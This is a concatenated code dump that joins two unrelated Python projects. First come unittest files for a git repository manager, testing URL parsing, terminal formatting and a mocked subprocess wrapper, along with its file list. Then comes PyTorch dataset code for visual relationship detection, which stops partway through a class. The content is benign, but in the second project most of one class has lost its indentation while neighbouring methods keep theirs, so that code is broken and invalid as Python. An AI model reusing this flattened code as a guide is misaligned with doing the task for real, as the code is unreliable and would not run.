        assert_components('git@github.com:hello/world/', g_h_w_c)
        assert_components('git@github.com:hello/world//', g_h_w_c)
        assert_components('ssh://git@github.com/hello/world.git', g_h_w_c)
        assert_components('ssh://git@github.com/hello/world', g_h_w_c)
        assert_components('ssh://git@github.com/hello/world/', g_h_w_c)
        assert_components('ssh://git@github.com/hello/world//', g_h_w_c)
        # https://github.com/user/repo
        # NOTE(review): the last three use ':' after the host instead of
        # '/' -- presumably deliberate mixed-separator cases; confirm
        assert_components('https://github.com/hello/world.git', g_h_w_c)
        assert_components('https://github.com:hello/world', g_h_w_c)
        assert_components('https://github.com:hello/world/', g_h_w_c)
        assert_components('https://github.com:hello/world//', g_h_w_c)
        # user@server.com url without an explicit user path component
        s_c_u_r = ['server.com', 'user', 'repository']
        assert_components('user@server.com:repository', s_c_u_r)
        assert_components('user@server.com:repository/', s_c_u_r)
        assert_components('user@server.com:repository//', s_c_u_r)
        assert_components('user@server.com:repository.git', s_c_u_r)
        assert_components('ssh://user@server.com/repository', s_c_u_r)
        assert_components('ssh://user@server.com/repository/', s_c_u_r)
        assert_components('ssh://user@server.com/repository//', s_c_u_r)
        assert_components('ssh://user@server.com/repository.git', s_c_u_r)

    def test_humanish_part(self):
        """ Checks that the humanish_part() method works properly """
        # .git suffix and trailing slashes must all be stripped
        self.assertEqual(
            implementation.RemoteRepository(
                'git@github.com:hello/world.git').humanish_part(),
            'world')
        self.assertEqual(
            implementation.RemoteRepository(
                'git@github.com:hello/world').humanish_part(),
            'world'
        )
        self.assertEqual(
            implementation.RemoteRepository(
                'git@github.com:hello/world/').humanish_part(),
            'world'
        )
        self.assertEqual(
            implementation.RemoteRepository(
                'git@github.com:hello/world//').humanish_part(),
            'world'
        )
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.utils import format
class TestFormat(unittest.TestCase):
    """ Tests that the Format() class works properly """

    def test_init(self):
        """ Tests that Format can not be instantiated """
        with self.assertRaises(TypeError):
            format.Format()

    def test_red(self):
        """ Tests that the red method works properly """
        # ANSI escape 91 = bright red, 00 = reset
        self.assertEqual(format.Format.red("Hello"), "\033[91mHello\033[00m")

    def test_yellow(self):
        """ Tests that the yellow method works properly """
        # ANSI escape 93 = bright yellow
        self.assertEqual(format.Format.yellow("Hello"),
                         "\033[93mHello\033[00m")

    def test_green(self):
        """ Tests that the green method works properly """
        # ANSI escape 92 = bright green
        self.assertEqual(format.Format.green("Hello"), "\033[92mHello\033[00m")

    def test_cyan(self):
        """ Tests that the cyan method works properly """
        # ANSI escape 96 = bright cyan
        self.assertEqual(format.Format.cyan("Hello"), "\033[96mHello\033[00m")

    @unittest.mock.patch.object(format.Format, 'short_rel_path')
    @unittest.mock.patch('os.path.expanduser', return_value='/home/user')
    def test_short_abs_path(self,
                            os_path_expanduser: unittest.mock.Mock,
                            format_short_rel_path: unittest.mock.Mock):
        """ Tests that the short_abs_path() method works properly """
        # length is too short
        with self.assertRaises(ValueError):
            format.Format.short_abs_path('hello/world', 3)
        # must be an absolute path
        with self.assertRaises(ValueError):
            format.Format.short_abs_path('hello/world', 10)
        # short path outside of $HOME
        self.assertEqual(
            format.Format.short_abs_path('/hello/world', 15),
            '/hello/world', 'short path outside of $HOME is left as is'
        )
        format_short_rel_path.assert_not_called()
        format_short_rel_path.reset_mock()
        # short path inside of $HOME
        self.assertEqual(
            format.Format.short_abs_path('/home/user/hello/world', 100),
            '/home/user/hello/world',
            'short path inside of $HOME is left as is'
        )
        format_short_rel_path.assert_not_called()
        format_short_rel_path.reset_mock()
        # path to be shortened outside of $HOME: the leading '/' is kept
        # and the rest is delegated to short_rel_path with one less char
        format_short_rel_path.return_value = 'hello/.../world'
        self.assertEqual(
            format.Format.short_abs_path('/hello/brave/world', 16),
            '/hello/.../world', 'path to be shortened outside of $HOME'
        )
        format_short_rel_path.assert_called_with('hello/brave/world', 15)
        format_short_rel_path.reset_mock()
        # path to be shortened inside of $HOME: the prefix becomes '~/'
        format_short_rel_path.return_value = 'hello/.../world'
        self.assertEqual(
            format.Format.short_abs_path('/home/user/hello/brave/world', 17),
            '~/hello/.../world', 'path to be shortened inside of $HOME'
        )
        format_short_rel_path.assert_called_with('hello/brave/world', 15)
        format_short_rel_path.reset_mock()

    def test_short_rel_path(self):
        """ Tests that the short_rel_path() method works properly """
        # length is too short
        with self.assertRaises(ValueError):
            format.Format.short_rel_path('hello/world', 2)
        # must be a relative path
        with self.assertRaises(ValueError):
            format.Format.short_rel_path('/hello/world', 10)
        self.assertEqual(format.Format.short_rel_path('hello/world', 15),
                         'hello/world', 'short path is given as is')
        self.assertEqual(
            format.Format.short_rel_path('hello/a/b//../.././/world', 15),
            'hello/world', 'convoluted path is cleaned up automatically')
        self.assertEqual(
            format.Format.short_rel_path('hello/brave/world', 15),
            'hello/.../world', 'replacing middle of three-component path '
                              'properly'
        )
        self.assertEqual(
            format.Format.short_rel_path('1234567890/1234/', 15),
            '1234567890/1234', 'remove unneeded slash from the end')
        self.assertEqual(
            format.Format.short_rel_path('a/b/cc/ddd/eeeee', 15),
            'a/b/.../eeeee', 'replacing long path properly'
        )
        self.assertEqual(
            format.Format.short_rel_path('hello/oh/brave/new/world', 15),
            'hello/.../world', 'replacing long path properly'
        )
        # when even first/last components together are too long, the
        # longer component itself is truncated with an ellipsis
        self.assertEqual(
            format.Format.short_rel_path('aaaaaaaaaa/bbbbb', 15),
            '...aaaaaa/bbbbb', 'shorten path from the start'
        )
        self.assertEqual(
            format.Format.short_rel_path('bbbbb/aaaaaaaaaa', 15),
            'bbbbb/aaaaaa...', 'shorten path from the end'
        )

    @unittest.mock.patch.object(format.Format, 'short_rel_path',
                                return_value='hello/world')
    @unittest.mock.patch.object(format.Format, 'short_abs_path',
                                return_value='/hello/world')
    def test_rel_path(self,
                      format_short_abs_path: unittest.mock.Mock,
                      format_short_rel_path: unittest.mock.Mock):
        """ Tests that the short_path() method works properly """
        # length is too short
        with self.assertRaises(ValueError):
            format.Format.short_path('hello/world', 5)
        # an absolute path is delegated to short_abs_path
        self.assertEqual(format.Format.short_path('/hello/world', 15),
                         '/hello/world', 'shorten absolute path')
        format_short_abs_path.assert_called_with('/hello/world', 15)
        format_short_abs_path.reset_mock()
        format_short_rel_path.assert_not_called()
        format_short_rel_path.reset_mock()
        # a relative path is delegated to short_rel_path
        self.assertEqual(format.Format.short_path('hello/world', 15),
                         'hello/world', 'shorten relative path')
        format_short_rel_path.assert_called_with('hello/world', 15)
        format_short_rel_path.reset_mock()
        format_short_abs_path.assert_not_called()
        format_short_abs_path.reset_mock()
class TestTerminalLine(unittest.TestCase):
    """ Tests that the TerminalLine() class works properly"""

    @unittest.mock.patch('shutil.get_terminal_size')
    def test_width(self, shutil_get_terminal_size: unittest.mock.Mock):
        """ Tests that format.width works properly """
        # width is read from the terminal size reported by shutil
        shutil_get_terminal_size.return_value.columns = 20
        self.assertEqual(format.TerminalLine().width, 20, "width of a "
                         "TerminalLine")
        shutil_get_terminal_size.assert_called_with()

    @unittest.mock.patch.object(format.TerminalLine, 'width', 20)
    @unittest.mock.patch.object(format.TerminalLine, 'append')
    @unittest.mock.patch('sys.stdout.isatty')
    def test_clean(self,
                   sys_stdout_isatty: unittest.mock.Mock,
                   format_terminal_line_append: unittest.mock.Mock):
        """ Tests that format.clean works properly """
        # resetting on a tty: the line is blanked with CR + spaces + CR
        sys_stdout_isatty.return_value = True
        format.TerminalLine().clean()
        format_terminal_line_append.assert_called_with(
            '\r \r')
        # reset all the things
        sys_stdout_isatty.reset_mock()
        format_terminal_line_append.reset_mock()
        # resetting on a non tty: nothing is written, only the internal
        # cache (name-mangled attribute) is emptied
        sys_stdout_isatty.return_value = False
        line = format.TerminalLine()
        line.clean()
        format_terminal_line_append.assert_not_called()
        self.assertEqual(line._TerminalLine__cache, '')

    @unittest.mock.patch.object(format.TerminalLine, 'append')
    def test_linebreak(self,
                       format_terminal_line_append: unittest.mock.Mock):
        """ Tests that format.linebreak works correctly"""
        # a linebreak is just an appended newline
        tl = format.TerminalLine()
        tl.linebreak()
        format_terminal_line_append.assert_called_with(
            '\n')

    @unittest.mock.patch.object(format.TerminalLine, 'clean')
    @unittest.mock.patch.object(format.TerminalLine, 'append')
    def test_write(self,
                   format_terminal_line_append: unittest.mock.Mock,
                   format_terminal_line_clean: unittest.mock.Mock):
        """ Tests that format.write works properly """
        # write() cleans the current line first, then appends the text
        format.TerminalLine().write('Hello world')
        format_terminal_line_clean.assert_called_with()
        format_terminal_line_append.assert_called_with('Hello world')

    @unittest.mock.patch('sys.stdout')
    @unittest.mock.patch.object(format.TerminalLine, 'flush')
    def test_append(self,
                    TerminalLine_flush: unittest.mock.Mock,
                    sys_stdout: unittest.mock.Mock):
        """ Tests that format.append works properly """
        # appending on a tty: text goes straight to stdout, cache stays empty
        sys_stdout.isatty.return_value = True
        # make a terminal line and write hello world
        tl = format.TerminalLine()
        tl.append('Hello world')
        sys_stdout.write.assert_called_with('Hello world')
        TerminalLine_flush.assert_called_with()
        self.assertEqual(tl._TerminalLine__cache, "")
        # reset all the mocks
        TerminalLine_flush.reset_mock()
        sys_stdout.reset_mock()
        # appending on a non-tty: text is buffered in the cache instead
        sys_stdout.isatty.return_value = False
        # make a terminal line and write hello world
        tl = format.TerminalLine()
        tl.append('Hello world')
        sys_stdout.write.assert_not_called()
        TerminalLine_flush.assert_called_with()
        self.assertEqual(tl._TerminalLine__cache, "Hello world")
        # reset all the mocks
        TerminalLine_flush.reset_mock()
        sys_stdout.reset_mock()

    @unittest.mock.patch('sys.stdout')
    def test_flush(self, sys_stdout: unittest.mock.Mock):
        """ Tests that format.flush works properly """
        # flushing on a tty: nothing buffered needs writing, only a flush
        sys_stdout.isatty.return_value = True
        # make a terminal line with a pre-filled cache
        tl = format.TerminalLine()
        tl._TerminalLine__cache = "Hello\nWorld"
        tl.flush()
        sys_stdout.write.assert_not_called()
        sys_stdout.flush.assert_called_with()
        # reset all the mocks
        sys_stdout.reset_mock()
        # flushing on a non-tty: complete lines are written out and the
        # trailing partial line stays in the cache
        sys_stdout.isatty.return_value = False
        tl = format.TerminalLine()
        tl._TerminalLine__cache = "Hello\nWorld"
        tl.flush()
        sys_stdout.write.assert_called_with("Hello\n")
        sys_stdout.flush.assert_called_with()
        self.assertEqual(tl._TerminalLine__cache, "World")
--- FILE SEPARATOR ---
import unittest
import unittest.mock
import subprocess
from GitManager.utils import run
class TestRun(unittest.TestCase):
    """ Tests that run.ProcessRun works properly """

    @unittest.mock.patch('os.getcwd', return_value='/')
    @unittest.mock.patch('os.environ.copy', return_value={})
    def test_init(self, os_environ_copy: unittest.mock.Mock,
                  os_getcwd_mock: unittest.mock.Mock):
        """ Tests that run instances are created properly """
        # almost everything is default: cwd and environment come from
        # the current process (mocked here)
        run1 = run.ProcessRun("echo", "Hello world")
        os_environ_copy.assert_called_once_with()
        os_getcwd_mock.assert_called_once_with()
        self.assertEqual(run1.exe, 'echo')
        self.assertEqual(run1.args, ['Hello world'])
        self.assertEqual(run1.cwd, '/')
        self.assertEqual(run1.environment, {})
        self.assertEqual(run1.pipe_stdout, False)
        self.assertEqual(run1.pipe_stderr, False)
        self.assertEqual(run1.pipe_stdin, False)
        # and reset the mocks please
        os_environ_copy.reset_mock()
        os_getcwd_mock.reset_mock()
        # use some non-default values: no fallback to the process state
        run2 = run.ProcessRun("echo", "Hello world", cwd='/hello',
                              pipe_stdout=True, environment={'hello': 'world'})
        os_environ_copy.assert_not_called()
        os_getcwd_mock.assert_not_called()
        self.assertEqual(run2.exe, 'echo')
        self.assertEqual(run2.args, ['Hello world'])
        self.assertEqual(run2.cwd, '/hello')
        self.assertEqual(run2.environment, {'hello': 'world'})
        self.assertEqual(run2.pipe_stdout, True)
        self.assertEqual(run2.pipe_stderr, False)
        self.assertEqual(run2.pipe_stdin, False)

    @unittest.mock.patch('subprocess.Popen')
    @unittest.mock.patch('os.getcwd', return_value='/')
    @unittest.mock.patch('os.environ.copy', return_value={})
    def test_stdout(self, os_environ_copy: unittest.mock.Mock,
                    os_getcwd_mock: unittest.mock.Mock,
                    subprocess_popen: unittest.mock.Mock):
        """ Tests that stdout works properly"""
        # fake the return value of stdout
        subprocess_popen.return_value.stdout = ''
        # create a run where we do not pipe stdout
        run1 = run.ProcessRun("echo", pipe_stdout=False)
        # in the ready state we should raise an error
        with self.assertRaises(run.ProcessRunStateError):
            run1.stdout
        # once we run, we should return the normal value
        run1.run()
        self.assertEqual(run1.stdout, '')
        # create a run where we do pipe stdout
        run2 = run.ProcessRun("echo", pipe_stdout=True)
        # in the ready state we should raise an error
        with self.assertRaises(run.ProcessRunStateError):
            run2.stdout
        # once we run, we should return None (because piping)
        run2.run()
        self.assertEqual(run2.stdout, None)

    @unittest.mock.patch('subprocess.Popen')
    @unittest.mock.patch('os.getcwd', return_value='/')
    @unittest.mock.patch('os.environ.copy', return_value={})
    def test_stderr(self, os_environ_copy: unittest.mock.Mock,
                    os_getcwd_mock: unittest.mock.Mock,
                    subprocess_popen: unittest.mock.Mock):
        """ Tests that stderr works properly"""
        # fake the return value of stderr
        subprocess_popen.return_value.stderr = ''
        # create a run where we do not pipe stderr
        run1 = run.ProcessRun("echo", pipe_stderr=False)
        # in the ready state we should raise an error
        with self.assertRaises(run.ProcessRunStateError):
            run1.stderr
        # once we run, we should return the normal value
        run1.run()
        self.assertEqual(run1.stderr, '')
        # create a run where we do pipe stderr
        run2 = run.ProcessRun("echo", pipe_stderr=True)
        # in the ready state we should raise an error
        with self.assertRaises(run.ProcessRunStateError):
            run2.stderr
        # once we run, we should return None (because piping)
        run2.run()
        self.assertEqual(run2.stderr, None)

    @unittest.mock.patch('subprocess.Popen')
    @unittest.mock.patch('os.getcwd', return_value='/')
    @unittest.mock.patch('os.environ.copy', return_value={})
    def test_stdin(self, os_environ_copy: unittest.mock.Mock,
                   os_getcwd_mock: unittest.mock.Mock,
                   subprocess_popen: unittest.mock.Mock):
        """ Tests that stdin works properly"""
        # fake the return value of stdin
        subprocess_popen.return_value.stdin = ''
        # create a run where we do not pipe stdin
        run1 = run.ProcessRun("echo", pipe_stdin=False)
        # in the ready state we should raise an error
        with self.assertRaises(run.ProcessRunStateError):
            run1.stdin
        # once we run, we should return the normal value
        run1.run()
        self.assertEqual(run1.stdin, '')
        # create a run where we do pipe stdin
        run2 = run.ProcessRun("echo", pipe_stdin=True)
        # in the ready state we should raise an error
        with self.assertRaises(run.ProcessRunStateError):
            run2.stdin
        # once we run, we should return None (because piping)
        run2.run()
        self.assertEqual(run2.stdin, None)

    @unittest.mock.patch('subprocess.Popen')
    @unittest.mock.patch('os.getcwd', return_value='/')
    @unittest.mock.patch('os.environ.copy', return_value={})
    def test_state(self, os_environ_copy: unittest.mock.Mock,
                   os_getcwd_mock: unittest.mock.Mock,
                   subprocess_popen: unittest.mock.Mock):
        """ Tests that state calls work properly """
        # create a new run instance
        run1 = run.ProcessRun("echo")
        # should start out with the ready() state
        self.assertEqual(run1.state, run.ProcessRunState.NEW)
        # we now run it and return None
        run1.run()
        subprocess_popen.return_value.returncode = None
        # which means we are always alive
        self.assertEqual(run1.state, run.ProcessRunState.ACTIVE)
        # once we have a return code we are finished
        subprocess_popen.return_value.returncode = 0
        self.assertEqual(run1.state, run.ProcessRunState.TERMINATED)

    @unittest.mock.patch('subprocess.Popen')
    @unittest.mock.patch('os.getcwd', return_value='/')
    @unittest.mock.patch('os.environ.copy', return_value={})
    def test_run(self, os_environ_copy: unittest.mock.Mock,
                 os_getcwd_mock: unittest.mock.Mock,
                 subprocess_popen: unittest.mock.Mock):
        """ tests that run() calls work properly """
        # make a (fairly default) run
        run1 = run.ProcessRun("echo")
        # run the process -- it should make a call to subprocess.Popen
        # (un-piped streams are captured with subprocess.PIPE)
        run1.run()
        subprocess_popen.assert_called_with(['echo'], cwd='/',
                                            stdout=subprocess.PIPE,
                                            stderr=subprocess.PIPE,
                                            stdin=subprocess.PIPE, env={})
        # and if you try to run it again, it should raise an error
        with self.assertRaises(run.ProcessRunStateError):
            run1.run()
        # reset the mock
        subprocess_popen.reset_mock()
        # make a (non-default) run
        run2 = run.ProcessRun("echo", "Hello world", pipe_stdout=True,
                              pipe_stderr=True, pipe_stdin=True,
                              cwd='/hello', environment={'hello': 'world'})
        # run the process -- it should make a call to subprocess.Popen
        # (piped streams are inherited, i.e. passed as None)
        run2.run()
        subprocess_popen.assert_called_with(['echo', 'Hello world'],
                                            cwd='/hello',
                                            stdout=None,
                                            stderr=None,
                                            stdin=None, env={'hello': 'world'})
        # and if you try to run it again, it should raise an error
        with self.assertRaises(run.ProcessRunStateError):
            run2.run()

    @unittest.mock.patch('subprocess.Popen')
    @unittest.mock.patch('os.getcwd', return_value='/')
    @unittest.mock.patch('os.environ.copy', return_value={})
    def test_wait(self, os_environ_copy: unittest.mock.Mock,
                  os_getcwd_mock: unittest.mock.Mock,
                  subprocess_popen: unittest.mock.Mock):
        """ Makes sure that the wait call works properly"""
        # make a new run and wait for the default amount of time
        # (wait() on a NEW run implicitly starts the process first)
        run1 = run.ProcessRun("echo")
        run1.wait()
        # wait() should have been called with None
        subprocess_popen.assert_called_with(['echo'], cwd='/',
                                            stdout=subprocess.PIPE,
                                            stderr=subprocess.PIPE,
                                            stdin=subprocess.PIPE, env={})
        subprocess_popen.return_value.wait.assert_called_with(timeout=None)
        subprocess_popen.reset_mock()
        # make a new run and wait for a fixed amount of time
        run2 = run.ProcessRun("echo")
        run2.wait(100)
        # wait should have been called with the given timeout
        subprocess_popen.assert_called_with(['echo'], cwd='/',
                                            stdout=subprocess.PIPE,
                                            stderr=subprocess.PIPE,
                                            stdin=subprocess.PIPE, env={})
        subprocess_popen.return_value.wait.assert_called_with(timeout=100)
        # this time run manually and pretend it is running
        run3 = run.ProcessRun("echo")
        run3.run()
        subprocess_popen.return_value.returncode = None
        # reset all the call counters
        subprocess_popen.reset_mock()
        # and now we should wait for 100, without re-spawning the process
        run3.wait(100)
        subprocess_popen.assert_not_called()
        subprocess_popen.return_value.wait.assert_called_with(timeout=100)

    @unittest.mock.patch('subprocess.Popen')
    @unittest.mock.patch('os.getcwd', return_value='/')
    @unittest.mock.patch('os.environ.copy', return_value={})
    def test_kill(self, os_environ_copy: unittest.mock.Mock,
                  os_getcwd_mock: unittest.mock.Mock,
                  subprocess_popen: unittest.mock.Mock):
        """ tests that killing works properly"""
        # make a new run and wait for the default amount of time
        run1 = run.ProcessRun("echo")
        # we can not kill it if it is not running.
        with self.assertRaises(run.ProcessRunStateError):
            run1.kill()
        # run the process and properly pretend that it is alive
        run1.run()
        subprocess_popen.return_value.returncode = None
        # now we can kill
        run1.kill()
        subprocess_popen.return_value.kill.assert_called_with()
        # pretend we have finished
        subprocess_popen.return_value.returncode = 1
        # we should not be able to kill anymore
        with self.assertRaises(run.ProcessRunStateError):
            run1.kill()

    @unittest.mock.patch('subprocess.Popen')
    @unittest.mock.patch('os.getcwd', return_value='/')
    @unittest.mock.patch('os.environ.copy', return_value={})
    def test_returncode(self, os_environ_copy: unittest.mock.Mock,
                        os_getcwd_mock: unittest.mock.Mock,
                        subprocess_popen: unittest.mock.Mock):
        """ Tests that the returncode attribute works properly """
        # make a new run; reading returncode on a NEW run starts the
        # process and waits for it
        run1 = run.ProcessRun("echo")
        # mock the returncode of the call
        subprocess_popen.return_value.returncode = 0
        self.assertEqual(run1.returncode, 0)
        # we should have called the subprocess
        subprocess_popen.assert_called_with(['echo'], cwd='/',
                                            stdout=subprocess.PIPE,
                                            stderr=subprocess.PIPE,
                                            stdin=subprocess.PIPE, env={})
        # and a wait call
        subprocess_popen.return_value.wait.assert_called_with(timeout=None)
        # make another call; an already-terminated run must not re-spawn
        run2 = run.ProcessRun("echo")
        run2.run()
        subprocess_popen.return_value.returncode = 1
        subprocess_popen.reset_mock()
        self.assertEqual(run2.returncode, 1)
        subprocess_popen.assert_not_called()
        subprocess_popen.return_value.wait.assert_not_called()

    @unittest.mock.patch('subprocess.Popen')
    @unittest.mock.patch('os.getcwd', return_value='/')
    @unittest.mock.patch('os.environ.copy', return_value={})
    def test_success(self, os_environ_copy: unittest.mock.Mock,
                     os_getcwd_mock: unittest.mock.Mock,
                     subprocess_popen: unittest.mock.Mock):
        """ Tests that the success attribute works properly """
        # make a new run; success implies running + waiting like returncode
        run1 = run.ProcessRun("echo")
        # mock the returncode of the call
        subprocess_popen.return_value.returncode = 0
        self.assertEqual(run1.success, True)
        # we should have called the subprocess
        subprocess_popen.assert_called_with(['echo'], cwd='/',
                                            stdout=subprocess.PIPE,
                                            stderr=subprocess.PIPE,
                                            stdin=subprocess.PIPE, env={})
        # and a wait call
        subprocess_popen.return_value.wait.assert_called_with(timeout=None)
        # make another call; non-zero returncode means failure
        run2 = run.ProcessRun("echo")
        run2.run()
        subprocess_popen.return_value.returncode = 1
        subprocess_popen.reset_mock()
        self.assertEqual(run2.success, False)
        subprocess_popen.assert_not_called()
        subprocess_popen.return_value.wait.assert_not_called()
class TestGitRun(unittest.TestCase):
    """ Tests that run.GitRun instances are constructed properly """

    @unittest.mock.patch('os.getcwd', return_value='/')
    @unittest.mock.patch('os.environ.copy', return_value={})
    def test_init(self, os_environ_copy: unittest.mock.Mock,
                  os_getcwd_mock: unittest.mock.Mock):
        """ Tests that GitRun instances are created properly """
        # With only positional arguments, the working directory and the
        # environment are pulled from the current process state (mocked).
        default_run = run.GitRun("Hello world")
        os_getcwd_mock.assert_called_once_with()
        os_environ_copy.assert_called_once_with()
        # the executable is always 'git'; the arguments are passed through
        self.assertEqual(default_run.exe, 'git')
        self.assertEqual(default_run.args, ['Hello world'])
        self.assertEqual(default_run.cwd, '/')
        self.assertEqual(default_run.environment, {})
        # no stream is piped by default
        for flag in ('pipe_stdout', 'pipe_stderr', 'pipe_stdin'):
            self.assertEqual(getattr(default_run, flag), False)
        # start from a clean slate before the second instance
        os_getcwd_mock.reset_mock()
        os_environ_copy.reset_mock()
        # Explicit keyword arguments are used verbatim, without
        # consulting the process state at all.
        custom_run = run.GitRun("Hello world", cwd='/hello',
                                pipe_stdout=True,
                                environment={'hello': 'world'})
        os_getcwd_mock.assert_not_called()
        os_environ_copy.assert_not_called()
        self.assertEqual(custom_run.exe, 'git')
        self.assertEqual(custom_run.args, ['Hello world'])
        self.assertEqual(custom_run.cwd, '/hello')
        self.assertEqual(custom_run.environment, {'hello': 'world'})
        self.assertEqual(custom_run.pipe_stdout, True)
        self.assertEqual(custom_run.pipe_stderr, False)
        self.assertEqual(custom_run.pipe_stdin, False)
|
[
"/GitManager/__main__.py",
"/GitManager/commands/__init__.py",
"/GitManager/commands/clone.py",
"/GitManager/commands/fetch.py",
"/GitManager/commands/gc.py",
"/GitManager/commands/lister.py",
"/GitManager/commands/pull.py",
"/GitManager/commands/push.py",
"/GitManager/commands/reconfigure.py",
"/GitManager/commands/state.py",
"/GitManager/commands/status.py",
"/GitManager/config/file.py",
"/GitManager/config/line.py",
"/GitManager/config/tree.py",
"/GitManager/main.py",
"/GitManager/repo/description.py",
"/GitManager/repo/finder.py",
"/GitManager/repo/implementation.py",
"/GitManager/utils/format.py",
"/GitManager/utils/run.py",
"/setup.py",
"/tests/commands/test_command.py",
"/tests/commands/test_fetch.py",
"/tests/commands/test_gc.py",
"/tests/commands/test_lister.py",
"/tests/commands/test_reconfigure.py",
"/tests/commands/test_setup.py",
"/tests/commands/test_state.py",
"/tests/commands/test_status.py",
"/tests/config/test_file.py",
"/tests/config/test_line.py",
"/tests/config/test_tree.py",
"/tests/repo/test_description.py",
"/tests/repo/test_finder.py",
"/tests/repo/test_implementation.py",
"/tests/utils/test_format.py",
"/tests/utils/test_run.py"
] |
00mjk/NMP
|
import torch
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
import random
import numpy as np
import os
import pickle
import ipdb
from utils import read_roidb, box_id, get_box_feats
class VrdPredDataset(Dataset):
"""docstring for VrdPred"""
def __init__(self, mode = 'train', feat_mode = 'full', prior = False, ori_vgg=False, use_loc=False):
super(VrdPredDataset, self).__init__()
self.num_nodes = 21
self.num_node_types = 101
self.num_edge_types = 71
self.num_edges = 41 #41 #30 #91
if mode == 'train':
self.mode = 'train'
else:
self.mode = 'test'
self.feat_mode = feat_mode
self.prior = prior
# ----------- senmantic feature ------------- #
self.predicates_vec = np.load('./data/vrd_predicates_vec.npy')
self.objects_vec = np.load('./data/vrd_objects_vec.npy')
# ------------ original roidb feature --------#
self.roidb_read = read_roidb('./data/vrd_pred_graph_roidb.npz')
self.roidb = self.roidb_read[self.mode]
# Exclude self edges
self.off_diag_idx = np.ravel_multi_index(
np.where(np.ones((self.num_nodes, self.num_nodes)) - np.eye(self.num_nodes)),
[self.num_nodes, self.num_nodes])
# ------------ prior probability ------------- #
# shape: [100, 100, 70] sum of the last dimension is 1
f = open('./data/vrd_so_prior.pkl', 'rb')
f.seek(0)
self.rel_so_prior = pickle.load(f, encoding='bytes') #[100, 100, 70]
# ------------- prior of the existance of current [sub, obj] pair ---#
# shape: [100, 100] sum=1
self.prior_probs = np.load('./data/vrd_prior_prob.npy', encoding='bytes')
self.use_loc = use_loc
def get_adj(self, roidb_use):
bbox_coordinates = np.zeros([self.num_edges, 20])
matrix = np.eye(self.num_nodes)
rel_rec = np.zeros([self.num_edges, self.num_nodes])
rel_send = np.zeros([self.num_edges, self.num_nodes])
sub_idx = box_id(roidb_use['sub_box_gt'], roidb_use['uni_box_gt'])
obj_idx = box_id(roidb_use['obj_box_gt'], roidb_use['uni_box_gt'])
for i in range(len(sub_idx)):
sub_id = int(sub_idx[i])
obj_id = int(obj_idx[i])
rel_rec[i] = matrix[obj_id]
rel_send[i] = matrix[sub_id]
bbox_coordinates[i] = get_box_feats(roidb_use['uni_box_gt'][sub_id], roidb_use['uni_box_gt'][obj_id])
# --------- cross entropy loss ---------#
edges = np.zeros(self.num_edges) + self.num_edge_types - 1
edges[:len(roidb_use['rela_gt'])] = roidb_use['rela_gt']
edges = np.array(edges, dtype=np.int64)
node_cls = np.zeros(self.num_nodes) + self.num_node_types - 1
node_cls[:len(roidb_use['uni_gt'])] = roidb_use['uni_gt']
node_cls = np.array(node_cls, dtype=np.int64)
return edges, node_cls, rel_rec, rel_send, bbox_coordinates
def train_item(self, roidb_use):
if self.feat_mode == 'full':
# --------- node feature ------------#
feats = np.load(roidb_use['uni_fc7'])
w2vec = list(map(lambda x: self.objects_vec[int(x)], roidb_use['uni_gt']))
w2vec = np.reshape(np.array(w2vec),[-1, 300])
nodes = np.zeros([self.num_nodes, 4396])
nodes[:feats.shape[0], :4096] = feats
nodes[:feats.shape[0], 4096:] = w2vec # [self.num_nodes, 4096+300]
elif self.feat_mode == 'vis':
feats = np.load(roidb_use['uni_fc7'])
nodes = np.zeros([self.num_nodes, 4096])
nodes[:feats.shape[0]] = feats
elif self.feat_mode == 'sem':
w2vec = list(map(lambda x: self.objects_vec[int(x)], roidb_use['uni_gt']))
w2vec = np.reshape(np.array(w2vec),[-1, 300])
nodes = np.zeros([self.num_nodes, 300])
nodes[:w2vec.shape[0]] = w2vec
prior_matrix = np.zeros([self.num_edges, self.num_edge_types])-0.5/self.num_edge_types
for i in range(len(roidb_use['rela_gt'])):
sub_cls = int(roidb_use['sub_gt'][i])
obj_cls = int(roidb_use['obj_gt'][i])
current_prior = self.rel_so_prior[sub_cls, obj_cls]
# current_prior = -0.5*(current_prior+1.0/self.num_edge_types)
current_prior = -0.5*(1.0/self.num_edge_types)
prior_matrix[i, :(self.num_edge_types-1)] = current_prior
# ------ region vgg feature --- initialize edge feature ---------#
# sub_idx = box_id(roidb_use['sub_box_gt'], roidb_use['uni_box_gt'])
# obj_idx = box_id(roidb_use['obj_box_gt'], roidb_use['uni_box_gt'])
edge_feats = np.zeros([self.num_edges, 512])
pred_fc7 = np.load(roidb_use['pred_fc7'])
edge_feats[:len(roidb_use['rela_gt'])] = pred_fc7
return nodes, edge_feats, prior_matrix
def __getitem__(self, index):
    """Assemble one image graph sample as torch tensors."""
    sample = self.roidb[index]
    nodes, edge_feats, prior_matrix = self.train_item(sample)
    edges, node_cls, rel_rec, rel_send, bbox_coordinates = self.get_adj(sample)
    # Float inputs.
    nodes = torch.FloatTensor(nodes)
    edge_feats = torch.FloatTensor(edge_feats)
    rel_rec = torch.FloatTensor(rel_rec)
    rel_send = torch.FloatTensor(rel_send)
    bbox_coordinates = torch.FloatTensor(bbox_coordinates)
    prior_matrix = torch.FloatTensor(prior_matrix)
    # Integer class targets.
    edges = torch.LongTensor(edges)
    node_cls = torch.LongTensor(node_cls)
    if not self.prior:
        return nodes, edges, node_cls, edge_feats, rel_rec, rel_send
    return nodes, edges, node_cls, edge_feats, rel_rec, rel_send, bbox_coordinates, prior_matrix
def __len__(self):
    """Number of image graphs in the current split."""
    return len(self.roidb)
class VrdRelaDataset(Dataset):
    """VRD relationship-detection graph dataset.

    Each item is one image graph: padded node features for the union set of
    object boxes, edge features for candidate subject/object pairs, and the
    rel_rec/rel_send matrices mapping each edge to its receiver/sender node.
    Candidate pairs come from detections ('*_dete' roidb keys) rather than
    ground truth.
    """
    def __init__(self, mode = 'train', feat_mode = 'full', prior=False, ori_vgg=False, use_loc=False):
        # mode: 'train', anything else -> 'test'
        # feat_mode: 'full' (vis+sem), 'vis', or 'sem' node features
        # prior: if True, __getitem__ also returns box coords + prior matrix
        # ori_vgg: accepted for interface parity; not used here
        super(VrdRelaDataset, self).__init__()
        self.num_nodes = 21 #44 #21
        self.num_edges = 41 #30 #170
        self.num_node_types = 101  # 100 VRD object classes + background slot
        self.num_edge_types = 71   # 70 VRD predicates + "no relation" slot
        self.feat_mode = feat_mode
        self.prior = prior
        if mode == 'train':
            self.mode = 'train'
        else:
            self.mode = 'test'
        # if mode == 'test':
